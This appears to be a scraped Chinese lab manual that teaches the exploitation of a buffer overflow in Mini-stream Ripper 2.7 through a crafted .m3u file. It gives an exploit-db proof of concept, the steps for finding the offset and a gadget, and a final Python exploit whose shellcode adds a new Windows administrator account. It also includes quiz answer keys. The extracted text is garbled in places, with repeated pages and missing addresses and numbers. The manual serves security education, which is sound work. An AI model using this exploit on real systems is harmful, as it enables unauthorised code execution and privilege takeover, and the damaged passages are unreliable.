实验指导书

Size: px

Start display at page:

Download "实验指导书"

劣贻首
5 years ago
Views:

1 从零开始学习软件漏洞挖掘系列教程第七篇 : 实战挖掘 Mini-stream Ripper 缓冲区溢出漏洞 1 实验简介实验所属系列 : 系统安全实验对象 : 本科 / 专科信息安全专业相关课程及专业 : 计算机网络实验时数 ( 学分 ):2 学时实验类别 : 实践实验类 2 实验目的通过利用一个存在漏洞的程序, 巩固前面学过的知识注意由于环境原因, 你在实验看到的地址和我的不一样, 后面要填充的字符也不一样, 不要照搬我的, 否则你将失败, 一切以你在实验过程中看到的为准! 3 预备知识 1. 关于 Mini-stream Ripper2.7 缓冲区溢出漏洞 TUNISIAN CYBER 在 exploit-db 报告了一个 Mini-stream Ripper 缓冲区溢出漏洞, 原文见报告指出通过构造一个恶意 m3u 文件, 诱使受害用户打开文件, 可以执行任意代码 2. 关于 m3u 文件的知识 M3U 本质上说不是音频文件, 它是音频文件的列表文件你下载下来打开它, 播放软件并不是播放它, 而是根据它的记录找到网络地址进行在线播放 M3U 文件的大小很小, 也就是因为它里面没有任何音频数据把 M3U 文件直接转换为音频文件是不可能的, 除非你把它指向的音频文件下载下来再作处理 m3u 格式的文件只是一个目录文件, 提供了一个指向其他位置的音频视频文件的索引, 你播放的还是那些被指向的文件, 用记事本打开 m3u 文件可以查看所指向文件的地址及文件的属性, 以选用合适播放器播放

2 4 实验环境服务器 :Windows 7 SP1,IP 地址 : 随机分配辅助工具 :Immunity Debugger,python2.7 5 实验步骤黑客帝国 Ⅱ 经典台词 : 什么是控制? 我们随时可以把这些机器关掉这句话一直深深烙印在我的脑海里以前这对于什么都不懂的我来说这遥不可及, 然而, 今天这不再是幻想下面带大家实践如何控制机器执行任意代码 : 我们的任务分为 2 个部分 : 1. 验证 Mini-stream Ripper2.7 存在漏洞 2. 利用 Mini-stream Ripper2.7 漏洞执行任意代码 5.1 实验任务一任务描述 : 构造超长的 m3u 验证 Mini-stream Ripper2.7 存在缓冲区溢出漏洞, 并验证 db-exploit 给出的 Poc( 漏洞利用证明 ) 1. 首先在 Win7 正确安装好 Mini-stream Ripper2.7 用下面的 python2.7 产生字符长的 m3u 文件 filename="c:\\test.m3u" # 待写入的文件名 myfile=open(filename,'w') # 以写方式打开文件 filedata="a"*30000 # 待写入的数据 myfile.write(filedata) # 写入数据 myfile.close() # 关闭文件运行这段 python 代码, 在 C 盘下找到 test.m3u 文件然后用 Mini-stream Ripper2.7 打开

Boom!!! 程序崩溃了不管是否这是可利用的漏洞, 至少这个程序有 bug 因为它没有检查我们的输入下面摘自 https://www.exploit-db.com/exploits/36501/ 的漏洞证明代码 : #!

3 Boom!!! 程序崩溃了不管是否这是可利用的漏洞, 至少这个程序有 bug 因为它没有检查我们的输入下面摘自的漏洞证明代码 : #!/usr/bin/env python #[+] Author: TUNISIAN CYBER #[+] Exploit Title: Mini-sream Ripper v Local Buffer Overflow #[+] Date: #[+] Type: Local Exploits #[+] Tested on: WinXp/Windows 7 Pro #[+] Vendor: = _8d9c5d7d948871f54ae14ed9304d1ddf&fileName=Mini-streamRipper. exe #[+] Friendly Sites: sec4ever.com #[+] #[+] Original POC: # #POC: #IMG1: # #IMG2: # from struct import pack file="c:\\crack.m3u" junk="\x41"*35032 eip=pack('<i',0x7c9d30d7) junk2="\x44"*4 #Messagebox Shellcode (113 bytes) - Any Windows Version By Giuseppe D'Amore #

$shellcode= ("\x31\xd2\xb2\x30\x64\x8b\x12\x8b\x52\x0c\x8b\x52\x1c\x8b\x42" "\x08\x8b\x72\x20\x8b\x12\x80\x7e\x0c\x33\x75\xf2\x89\xc7\x03"$

4 shellcode= ("\x31\xd2\xb2\x30\x64\x8b\x12\x8b\x52\x0c\x8b\x52\x1c\x8b\x42" "\x08\x8b\x72\x20\x8b\x12\x80\x7e\x0c\x33\x75\xf2\x89\xc7\x03" "\x78\x3c\x8b\x57\x78\x01\xc2\x8b\x7a\x20\x01\xc7\x31\xed\x8b" "\x34\xaf\x01\xc6\x45\x81\x3e\x46\x61\x74\x61\x75\xf2\x81\x7e" "\x08\x45\x78\x69\x74\x75\xe9\x8b\x7a\x24\x01\xc7\x66\x8b\x2c" "\x6f\x8b\x7a\x1c\x01\xc7\x8b\x7c\xaf\xfc\x01\xc7\x68\x79\x74" "\x65\x01\x68\x6b\x65\x6e\x42\x68\x20\x42\x72\x6f\x89\xe1\xfe" "\x49\x0b\x31\xc0\x51\x50\xff\xd7") writefile = open (file, "w") writefile.write(junk+eip+junk2+shellcode) writefile.close() 我们运行这段 python 代码, 在 C:\ 产生了 crack.m3u 文件试着用 Mini-stream Ripper2.7 打开程序报错, 但是并没有执行 shellcode 前面的 Poc 有下面这句话 #Messagebox Shellcode (113 bytes) - Any Windows Version By Giuseppe D'Amore Messagebox Shellcode,MessageBox 是一个弹框的 API 函数, 可以推测 shellcode 功能是弹框, 但是在我的电脑没有看到 shellocde 执行成功, 你可以复制这个 POC 代码, 运行它, 也看到它没利用成功 ( 或者你真的幸运的话, 会成功的 ) 又或者你试着理解它并编译自己的可以成功利用的 Exploit; 在者你就从头开始编写自己的 Exploit 啰嗦下 : 除非你真能够快速的反汇编和读懂 shellcode, 否则我建议你不要拿到一个 Exploit ( 特别是已经编译了的可执行文件 ) 就运行它, 假如它仅仅是为了在你电脑上开一个后门呢? 问题是 :Exploit 作者是怎样开发他们的利用程序的呢? 从检测可能存在的问题到编写可以利用成功的 Exploi 这个过程是怎么样的呢? 您如何使用漏洞信息, 编写自己的 Exploit 呢? 下面带领大家完成这个过程

5 练习以下说法正确的是? 单选题 A exploit-db 提供的 Exploit 在我们的系统总是可用的 B m3u 是视频格式文件 C 能控制 EIP 就一定能执行任意代码 D 拿到一个 Exploit 应该在我们的虚拟机测试它答案 :D 5.2 实验任务二任务描述 : 编写自己的 Exploit 1. 通常你可以在漏洞报告中得到基本的信息在本例中, 基本信息有 : 通过创建一个恶意的.m3u 文件将触发 Mini-stream Ripper2.7 缓冲区溢出利用这些报告往往没什么特别之处, 但在多数情况下, 你会从中得到一些灵感来模拟一次崩溃或让程序行为异常如果没有, 那么第一个发现的安全研究人员可能会透露给供应商, 给他们机会修补... 或者只是想保密为他 / 她所用前面我们知道 Mini-stream Ripper2.7 确实存在 bug 很明显, 一个程序的崩溃并不都意味着存在可利用的漏洞, 在多数情况下, 程序崩溃并不能利用, 但是有时候是可以利用的可利用, 我是指你可以让程序做出越轨的事... 比如执行你自己的代码, 让一个做越轨的事最简单的方法是控制它的执行流程 ( 让它指向别是什么地方 ) 可通过控制指令指针 (EIP), 这个 CPU 寄存器永远指向下一条要执行的指令地址为了观察程序崩溃现场, 我们用 Immunity Debugger 载入程序并运行, 然后载入前面的个字符的 test.m3u 文件

程序中断, 观察此时的调试器, 发现 EIP 已经被覆盖为 0x41414141(AAAA), 再看堆栈窗口, 堆栈被覆盖了一堆 A 由此我们可以知道, 通过构造恶意的 m3u 文件, 可以造成缓冲区溢出, 覆盖 EIP 执行任意代码, 这不仅仅是一个 bug 了, 因为我们控制了程序的流程小知识补充 : 在 Intel X86 上, 采用小端字节序 (moonife: 地址低位存储值的低位,

6 程序中断, 观察此时的调试器, 发现 EIP 已经被覆盖为 0x (AAAA), 再看堆栈窗口, 堆栈被覆盖了一堆 A 由此我们可以知道, 通过构造恶意的 m3u 文件, 可以造成缓冲区溢出, 覆盖 EIP 执行任意代码, 这不仅仅是一个 bug 了, 因为我们控制了程序的流程小知识补充 : 在 Intel X86 上, 采用小端字节序 (moonife: 地址低位存储值的低位, 地址高位存储值的高位 ) 所以你看到的 AAAA 其实是反序的 AAAA( 就是如果你传进缓冲区的是 ABCD,EIP 的值将是 :DCBA) 前面我们的 m3u 文件里面都是 A, 我们无法确切的知道缓冲区的大小已至于我们无法把 shellcode 的起始地址写到 EIP, 所以我们要定位保存的返回地址在缓冲区的偏移但是在开始前, 还记得我们前面讲过的 ASLR,GS,SafeSeh 吗? 在这个例子中我们不需要考虑 SafeSeh 因为我不打算覆盖 SEH 可以使用 Immunity Debugger 的 mona 插件可以查看程序所有模块 ASLR,GS,SafeSeh 信息 Alt+L 切换到日志窗口, 找到 SEH.txt 文件

txt 是针对模块的, 所以它不会列出某个模块有没有 GS 不管怎么样, 我们可以先假设有漏洞的函数没有 GS 保护, 如果在利用过程中发现有, 那就再说从 SEH.

7 打开 SEH.txt 文件 Rebase,NXCompat 不用管它,Rebase 类似于 ASLR,NXCompat 在 Win7 默认不起作用但是, 你发现这里好像没有 GS? 原来 GS 是以函数为单位的, 也就是说一个模块有的函数有 GS 有的没有 GS 而 SEH.txt 是针对模块的, 所以它不会列出某个模块有没有 GS 不管怎么样, 我们可以先假设有漏洞的函数没有 GS 保护, 如果在利用过程中发现有, 那就再说从 SEH.txt 可以知道 MSRcodec06.dll, MSRcodec02.dll 等好多个模块的 ASLR 为 false, 这很好, 不是吗? 我们可以利用这些模块的 jmp esp 覆盖返回地址, 因为这些地址在机器重启后依然不变, 所以构造出的 Exploit 比较稳定接下来定位溢出点 : 使用!mona pc 产生个随机字符

$m3u 你可以在 C:\ 找到它用 Immunity$

8 找到 pattern.txt 文件, 打开把选中的那些东西去掉, 重新保存为 pattern.m3u 你可以在 C:\ 找到它用 Immunity Debugger 运行 Mini-stream Ripper2.7, 打开 pattern.m3u

$程序在执行 0x48336D48(H3mH) 发生访问异常在 Immunity Debugger 命令窗口输入 :!mona po H3mH 可见 5829 字节可以覆盖到返回地址为了确保准确我们来确认一下 filename="c:\\test1.$

9 程序在执行 0x48336D48(H3mH) 发生访问异常在 Immunity Debugger 命令窗口输入 :!mona po H3mH 可见 5829 字节可以覆盖到返回地址为了确保准确我们来确认一下 filename="c:\\test1.m3u"# 待写入的文件名 myfile=open(filename,'w') # 以写方式打开文件 filedata="a"*5829 myfile.write(filedata) # 写入数据 myfile.close() # 关闭文件在 C:\ 你可以找到这个 test1.m3u, 重复前面的步骤

$20280+5829=26109 字节覆盖到返回地址我们把上面的 python 代码改成下面这样 filename="c:\\test2.$

10 程序没报错, 弹出了这个界面说明我们应该是没有覆盖到返回地址如果你注意看前面的 pattern.txt 里面的个字符, 你会发现它每循环一次也就是说 H3mH 出现在前第一次的 5829 偏移处所以实际需要 =26109 字节覆盖到返回地址我们把上面的 python 代码改成下面这样 filename="c:\\test2.m3u"# 待写入的文件名 myfile=open(filename,'w') # 以写方式打开文件 filedata="a"*26109 myfile.write(filedata) # 写入数据 myfile.close() # 关闭文件生成 test2.m3u 文件, 你可以在 C:\ 找到, 重复前面的步骤

11 晕, 程序还是没有崩溃不要灰心,mona.py 也可能算的不准起码我们现在知道了字节没崩溃,30000 字节崩溃那么我们可以把 python 代码改成这样 filename="c:\\test3.m3u"# 待写入的文件名 myfile=open(filename,'w') # 以写方式打开文件 filedata="a"*26109+'b'*1000+'c'*1000+'d'*1000+'e'*1000 myfile.write(filedata) # 写入数据 myfile.close() # 关闭文件 C:\ 产生 test3.m3u 文件, 重复前面的步骤, Boom!!!EIP 被覆盖为 0x , 从堆栈窗口看似乎是 "A"*26109+'B'*12 就可以覆盖到 EIP 了, 用下面的 python 代码验证 : filename="c:\\test4.m3u"# 待写入的文件名 myfile=open(filename,'w') # 以写方式打开文件 filedata="a"*26109+'b'*12+'c'*4+'d'*4+'e'*4+'f'*4 myfile.write(filedata) # 写入数据 myfile.close() # 关闭文件再次打开

12 Perfect!!!0x (CCCC) 覆盖了 EIP, 并且此时 ESP 指向的值为 0x (EEEE) 下面我们只需要在没有 ASLR 的模块找到一条 jmp esp 地址注 :jmp [esp+n],call esp,call [esp+n] 等也行但是很快我发现了一个问题, 大概也就知道为什么前面为什么我们用 db-exploit 那段 Poc 不起作用了请看所有 ASLR 为 False, 而 Rebase 为 True 的模块, 图中我没有全部画出来比如上图第一个有图可以知道它的加载基地址是 0x048d000, 但是我用 Immunity

Debugger 调试器重新载入 Mini-stream Ripper2.7 看加载的模块 0x048d000 处没有加载任何模块由此我们知道如果某个模块的 Rebase 为 True, 那么在程序重启后它加载的地址就会变, 有点类似 ASLR 所以本例子我们需要选择 Rebase 和 ASLR 都为 False 的模块我在 SEH.

13 Debugger 调试器重新载入 Mini-stream Ripper2.7 看加载的模块 0x048d000 处没有加载任何模块由此我们知道如果某个模块的 Rebase 为 True, 那么在程序重启后它加载的地址就会变, 有点类似 ASLR 所以本例子我们需要选择 Rebase 和 ASLR 都为 False 的模块我在 SEH.txt 发现了两个模块符合 : 0x x0051a000 0x0011a000 False False False False False [Ripper.exe] 0x x1007b000 0x0007b000 False False False False False [MSRfilter01.dll] 但是 Ripper.exe 地址以 0x00 开头, 又截断符, 所以可选的只有 MSRfilter01.dll 了更加不幸的是, 我在 MSRfilter01.dll 模块内没有找到任何 jmp esp jmp dword ptr [esp+n],call esp,call dword ptr [esp+4] 等指令到这里似乎陷入了僵局看来我们还是没法偷窥女神的 / 坏但是很快我又想到,ESP 不是指向 shellcode 嘛, 那如果我找到 push esp,retn 指令呢? 这个指令序列也很常见 Push esp 相当于把 shellcode 的地址压栈,retn 把 shellcode 的地址从栈弹到 EIP, 接着就可以执行 shellcode 了起码我们还有希望, 继续在 MSRfilter01.dll 模块搜寻 push esp,retn 序列幸运的是, 我找到了下面这几个 : 1000F PUSH ESP 1000F915 C3 RETN 1000F PUSH ESP 1000F929 C3 RETN

14 1003AED3 54 PUSH ESP 1003AED4 C3 RETN 1003AEEE 54 PUSH ESP 1003AEEF C3 RETN 1003AF00 54 PUSH ESP 1003AF01 C3 RETN 1003AF49 54 PUSH ESP 1003AF4A C3 RETN 1003AF5A 54 PUSH ESP 1003AF5B C3 RETN 1003AF84 54 PUSH ESP 1003AF85 C3 RETN 1003AFAD 54 PUSH ESP 1003AFAE C3 RETN 1003AFCF 54 PUSH ESP 1003AFD0 C3 RETN 10040FC1 54 PUSH ESP 10040FC2 C3 RETN 10040FE6 54 PUSH ESP 10040FE7 C3 RETN E6 54 PUSH ESP E7 C3 RETN 不错嘛, 很多但是类似于第一个这个 0x1000F914 就不可用, 有截断符 \x00 但是我们仍然有几个可用, 比如最后这个 0x100418E6 好, 搞定返回地址下面把 python 代码改成这样 : filename="c:\\test4.m3u"# 待写入的文件名 myfile=open(filename,'w') # 以写方式打开文件 filedata="a"*26109+'b'*12+'\xe7\x18\x04\x10'+'d'*4+'shellcode' myfile.write(filedata) # 写入数据 myfile.close() # 关闭文件

$其中 shellcode 替换成你想要执行的代码比如 : 此处略去三百字, 嘿嘿我还是用前面添加用户的 shellcode: filename="c:\\test5.$

15 其中 shellcode 替换成你想要执行的代码比如 : 此处略去三百字, 嘿嘿我还是用前面添加用户的 shellcode: filename="c:\\test5.m3u"# 待写入的文件名 myfile=open(filename,'w') # 以写方式打开文件 filedata="a"*26109+'b'*12+'\xe6\x18\x04\x10'+'d'*4+'\x31\xd2\xb2\x30\x64\x8b\x1 2\x8b\x52\x0c\x8b\x52\x1c\x8b\x42\x08\x8b\x72\x20\x8b\x12\x80\x7e\x0c\x33\x75\ xf2\x89\xc7\x03\x78\x3c\x8b\x57\x78\x01\xc2\x8b\x7a\x20\x01\xc7\x31\xed\x8b\x3 4\xaf\x01\xc6\x45\x81\x3e\x57\x69\x6e\x45\x75\xf2\x8b\x7a\x24\x01\xc7\x66\x8b\x 2c\x6f\x8b\x7a\x1c\x01\xc7\x8b\x7c\xaf\xfc\x01\xc7\x68\x4b\x33\x6e\x01\x68\x20\x 42\x72\x6f\x68\x2f\x41\x44\x44\x68\x6f\x72\x73\x20\x68\x74\x72\x61\x74\x68\x69\ x6e\x69\x73\x68\x20\x41\x64\x6d\x68\x72\x6f\x75\x70\x68\x63\x61\x6c\x67\x68\x7 4\x20\x6c\x6f\x68\x26\x20\x6e\x65\x68\x44\x44\x20\x26\x68\x6e\x20\x2f\x41\x68\x 72\x6f\x4b\x33\x68\x33\x6e\x20\x42\x68\x42\x72\x6f\x4b\x68\x73\x65\x72\x20\x68 \x65\x74\x20\x75\x68\x2f\x63\x20\x6e\x68\x65\x78\x65\x20\x68\x63\x6d\x64\x2e\x 89\xe5\xfe\x4d\x53\x31\xc0\x50\x55\xff\xd7' myfile.write(filedata) # 写入数据 myfile.close() # 关闭文件你可以在 C:\ 找到这个 test5.m3u, 打开这个文件前然后直接用 Mini-stream Ripper2.7 打开 test5.m3u

16 再看看 Boom!!! 利用成功

17 练习以下说法正确的是 : 单选题 A Rebase 和 ASLR 是一样的 B Rebase 是堆栈基址重定位, 基址是加载的首地址 C 前面可以用 1003AF5A 54 PUSH ESP 1003AF5B C3 RETN 利用 D 前面可以用 1000F PUSH ESP 1000F915 C3 RETN 利用答案 :C 6 实验报告要求参考实验原理与相关介绍, 完成实验任务, 并对实验结果进行分析, 完成思考题目, 总结实验的心得体会, 并提出实验的改进意见 7 分析与思考 1) 绕过 ASLR 的其它技术 8 配套学习资源

实验指导书

实验指导书从零开始学习软件漏洞挖掘系列教程第三篇 : 利用 SEH 机制 Exploit it 1 实验简介实验所属系列 : 系统安全实验对象 : 本科 / 专科网络 / 信息安全专业相关课程及专业 : 计算机网络, 信息安全实验时数 ( 学分 ):2 学时实验类别 : 实践实验类 2 实验目的在传统的缓冲区溢出中, 我们可以通过覆盖返回地址以跳转到 shellcode 但并不是所有的溢出都是那么简单的